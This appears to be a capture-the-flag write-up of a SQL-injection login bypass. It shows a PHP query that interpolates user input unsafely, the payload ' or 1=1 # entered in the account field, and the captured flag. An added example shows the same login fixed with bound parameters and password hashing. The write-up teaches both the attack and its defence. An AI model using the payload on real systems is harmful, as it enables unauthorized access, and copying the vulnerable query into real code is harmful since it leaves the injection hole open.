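0x01 Background
1. How the universal password works:
// Vulnerable: user input is interpolated directly into the SQL string.
$sql = "SELECT * FROM user WHERE username = '{$username}' AND password = '{$password}'";
$res = $dbConnect->query($sql);
The above is a typical SQL statement. After entering ' or 1=1 # the SQL statement becomes:
$sql = "SELECT * FROM user WHERE username = '' or 1=1 # ' AND password = '' or 1=1 # '";
In MySQL, # starts a comment, so everything after it is ignored, and the remaining condition username = '' or 1=1 is true for every row.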
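The same login written with a bound parameter, as an added example (not code from the original write-up). The user table follows the page; the make_db() and login() helpers, the in-memory SQLite database and the sample account are assumptions made here so the script runs offline.

```php
<?php
declare(strict_types=1);
// Added example: constructed schema and data in an in-memory SQLite database
// (via PDO), so nothing outside this script is needed.

function make_db(): PDO
{
    $pdo = new PDO('sqlite::memory:');
    $pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
    $pdo->exec('CREATE TABLE user (username TEXT PRIMARY KEY, password TEXT NOT NULL)');
    // Constructed account; the password is stored as a hash, never in plain text.
    $ins = $pdo->prepare('INSERT INTO user (username, password) VALUES (?, ?)');
    $ins->execute(['admin', password_hash('S3cret-example', PASSWORD_DEFAULT)]);
    return $pdo;
}

// Hypothetical helper: returns true only for a matching username and password.
function login(PDO $pdo, string $username, string $password): bool
{
    // The placeholder keeps $username as data: quotes and # never reach the
    // SQL parser as syntax, so the WHERE clause cannot be rewritten.
    $stmt = $pdo->prepare('SELECT password FROM user WHERE username = :u');
    $stmt->execute([':u' => $username]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    if ($row === false) {
        return false; // no such user
    }
    // The password is checked in PHP against the stored hash, not inside the query.
    return password_verify($password, $row['password']);
}

$pdo = make_db();
var_dump(login($pdo, 'admin', 'S3cret-example')); // valid credentials
var_dump(login($pdo, "' or 1=1 #", 'anything'));  // the page's input in the account field
var_dump(login($pdo, 'admin', "' or 1=1 #"));     // the same input in the password field
```

With the page's input, the query looks for a user literally named ' or 1=1 #, finds no row, and the login is rejected.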
0x02 Exploitation
1. Enter ' or 1=1 # directly in the account field; the password can be anything.
2. Get the flag: htryyujryfhyjtrjn
0x03 Conclusion